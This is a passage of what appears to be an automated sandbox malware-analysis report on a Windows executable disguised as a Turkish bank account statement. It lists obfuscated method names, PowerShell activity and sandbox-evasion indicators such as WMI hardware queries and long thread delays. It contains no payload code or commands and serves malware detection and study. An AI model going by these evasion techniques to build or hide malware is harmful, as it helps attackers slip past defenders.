                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, NOSfVqqeoph6EVZH5u.csHigh entropy of concatenated method names: 'vOlhVP8XEc', 'NFJhlOywTT', 'ToString', 'ctjhyQNq4q', 'SJyh8NMT3M', 'mkyhuF1B7I', 'HZohAaLoZa', 'zIChsRum2K', 'dZihYAaoPS', 'omuhjwkY6F'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack: High entropy of concatenated method names (reported for multiple .cs classes with obfuscated names)

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: hesaphareketi__20241001.exe PID: 5732, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: 15D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: 3080000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: 2EC0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: 7F50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: 8F50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: 9100000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: A100000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: A790000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: B790000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: C790000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: 2B60000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: 2D70000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: 2B60000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1200000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199828Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199718Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199592Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199484Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199375Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199248Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199140Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1199031Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198894Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198734Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198504Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198218Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1198020Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197875Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197765Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197656Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197546Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197437Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197328Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197218Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197109Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1197000Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196890Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196781Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196672Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196559Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196453Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196343Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196234Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196125Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1196015Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195906Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195797Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195687Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195578Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195468Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195359Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195250Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195140Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1195031Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194922Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194812Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194703Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194593Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194484Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194374Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194265Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194156Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1194047Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193937Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193827Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193718Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeThread delayed: delay time: 1193609Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6786
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2873
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Window / User API: threadDelayed 2687
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Window / User API: threadDelayed 7152
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 5420 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3304 Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944 Thread sleep time: -35048813740048126s >= -30000s
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1200000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199592s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199248s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1199031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198894s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198504s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1198020s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197546s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1197000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196559s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1196015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1195031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1194047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1193937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1193827s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1193718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe TID: 2944Thread sleep time: -1193609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
